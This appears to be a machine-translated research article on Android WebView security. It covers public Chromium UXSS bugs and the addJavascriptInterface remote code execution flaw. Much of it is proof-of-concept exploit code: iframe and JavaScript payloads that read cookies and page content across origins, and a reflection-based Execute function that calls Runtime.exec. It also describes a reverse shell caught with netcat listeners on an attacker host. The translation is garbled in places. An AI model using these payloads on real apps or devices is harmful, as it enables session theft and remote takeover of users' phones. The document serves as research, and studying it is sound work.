Android WebView Security Research

1. What is WebView UXSS

WebView is the underlying component of the Android Chrome browser and is the core class in the WebKit framework, derived from view in the Android SDK to not invoke the browser in Android Activity layout. directly implement basic browser functions such as displaying Web pages.

The basic usage of WebView in Android programs is as follows:

Layout file

<?xml version= "1.0" encoding= "Utf-8"? ><webview xmlns:android= "Http://schemas.android.com/apk/res/android "Android:id=" @+id/webview "android:layout_width=" fill_parent "android:layout_height=" Fill_parent "/>

Loading Web pages

WebView Mywebview = (WebView) Findviewbyid (R.id.webview); Mywebview.loadurl ("http://www.example.com");

Declare in Manifest

<manifest > <uses-permission android:name= "Android.permission.INTERNET"/> ...</manifest>

Because XSS vulnerabilities exist in WebView that do not depend on specific Web sites and terminal platforms, they exist in WebKit-based browsers and are therefore referred to as Universal XSS--UXSS.

2. Google's public WebView UXSS

• bug#37383 Javascript:url with a leading null byte can bypass cross origin protection leading NULL byte JavaScript pseudo-protocol can bypass the same-origin policy.

Poc:

Hehe.html<iframe name= "test" src= "http://www.g.cn" ></iframe><input type=button value= "test" onclick= "Window.Open (' \u0000javascript:alert (document.cookie) ', ' Test ')" >

Or

<iframe name= "test" src= "http://www.g.cn" ></iframe><input type=button value= "test" onclick= " window.open (' \x00javascript:alert (document.cookie) ', ' Test ') ' >

• bug#90222 UXSS with Document.baseuri attacker set Document.baseuri to bypass homologous policy for Javascript:url

Poc:

<script>i = Document.body.appendChild (document.createelement ("iframe")); i.src = "http://google.com"; i.onload = function () {Document.documenturi = "Javascript://hostname.com/%0d%0aalert (' OH HAI ' + location)"; I.contentwindow.location = "";} </script>

• bug#98053 Uxss via htmlobjectelement via htmlobjectelement label UXSS

Poc:

<script>window.onload = function () {object = Document.createelement ("Object");    Object.data = "http://google.com/";    Document.body.appendChild (object);        Object.onload = function () {object.data = "Javascript:alert (Document.body.innerHTML)";    object.innerhtml = "Foo"; }}</script>

• bug#143439 Universal XSS in frame elements handling handles UXSS in a FRAME element

The bug mentions four ways to handle frame-led UXSS.

One of the poc:inserting the target frame element during the execution of the helper frame element ' s onunload handler, after all Candidates for the child frame Disconnector has been collected.

container = Document.body.appendChild (document.createelement ("div")); helperframe = Container.appendchild ( Document.createelement ("iframe")); targetframe = Document.createelement ("iframe"); HelperFrame.contentWindow.onunload = function () {Container.insertbefore (targetframe, helperframe);} Document.body.removeChild (container); alert (Targetframe.contentwindow);

• bug#143437 V8 Builtins object exposed to user causing UXSS exposes V8 Builtins objects to users resulting in UXSS

in V8natives.js of Chromium

function Newfunction (arg1) {... var source = ' (function (' + p + ') {\ n ' + body + ' \ n}) ', .... var f =%compilestring (Sourc e) ();

When the ' this ' pointer points to a V8 Builtins object, the user provides a custom body that causes the JavaScript code to execute

POC:javascript:Function ("},alert (This), {").

More detailed Expoit

<body><script>frame = document.body.appendchild (Document.createelement ("iframe")); frame.src =  "http://xkcd.com/"; Frame.onload = function ()  {         function ("},  (Builtins = this),  function ()  {");         originalinstantiate = builtins. Instantiate;        builtins. Defineoneshotaccessor (builtins,  "Instantiate",  function ()  {});         flag = 0;        template = null ;         builtins. Instantiate = function (x, y)  {                 if  (flag)  {                         doc = frame.contentwindow.document;                          alert (Doc.body.innerHTML);                         flag = 0;                 } else if   (!template)                          template = x;                 return originalinstantiate (X, y);         };         document.implementation;        flag = 1;         Builtins. Configuretemplateinstance (frame.contentwindow, template);} </script></body>

Someone on Wooyun developed a mobile browser UXSS vulnerability Online test page http://uxss.sinaapp.com
The currently included POC includes:
' https://code.google.com/p/chromium/issues/detail?id=143437 '
' https://code.google.com/p/chromium/issues/detail?id=37383 ',
' https://code.google.com/p/chromium/issues/detail?id=143439 '
' https://code.google.com/p/chromium/issues/detail?id=98053 '
' Https://code.google.com/p/chromium/issues/detail?id=117550 '
' https://code.google.com/p/chromium/issues/detail?id=90222 '

With UXSS, you can bypass the same-origin policy to execute JS, if the Access attack page in the app using WebView has access to local files, with the session cookie and password sensitive information, local files and sensitive information may be stolen.

3. More Dangerous WebView Addjavascriptinterface interface

This interface is used to implement local Java and JS interaction, using Addjavascriptinterface This interface function can be implemented JS injection webview Call native Java method, even control the Android system

When Android uses the WebView Addjavascriptinterface interface, and the compile API level is less than 4.2, there may be a WebView remote code execution vulnerability, and the exploit depends on the use of WebView The permissions that the app has.

The following code illustrates how Addjavascriptinterface is used in WebView,

public classmainactivityextendsactivity {           privateWebViewmyWebView;    @Override    protectedvoidoncreate (bundle  savedinstancestate)  {       super.oncreate (savedInstanceState);        mywebview=newwebview (This);        Mywebview.getsettings (). Setjavascriptenabled (True); //  allow execution javascript        mywebview.addjavascriptinterface (Newjavascriptinterface (), "Jsinterface");  // Registers an object named Jsinterface, which is accessed by JS and calls its methods.        mywebview.loadurl ("http://192.168.3.155/attackwv.html");  // WebView loading called Jsinterface's Web page         setcontentview (mywebview);     }       finalclassJavaScriptInterface {         JavaScriptInterface  ()  { }        Publicstring getsomestring ()  {               return "Hello, world";        }     }}

In Attackwv.html, a simple call to the

The performance in the Android 4.1.2 Simulator is as follows, the method of Javascriptinterface in WebView was successfully called through JS.

But we are not just content to print Hello World, is there a way to execute arbitrary commands remotely?
The answer is: You can take advantage of Java's reflection mechanism to get the Java.lang.Runtime object and execute arbitrary commands, the permissions of which depend on the app permissions that use WebView.
The modified attackwv1.html, as shown below, can be successfully implemented using the EXECUTE function to rebound the shell
Open two shell windows in 192.168.3.166,
Nc-l-VV 8088
Nc-l-VV 9999
Successfully acquired the shell of the Android 4.1.2 Simulator.
The limitation of this method is that the interface name Jsinterface must be known. But by exhaustive loading the Web Page object now, to determine whether it supports Java reflection, can also get a call Java method object without knowing the interface name, the amended execute as follows,
function Execute (CMD) {for (var obj. window) {if ("GetClass" in Window[obj]) {return Window[obj].getclass (). forname ("Java.lang.Runtime"). GetMethod ("GetRuntime", null). Invoke (null,null). exe         C (CMD); }     } }

Android WebView Security Research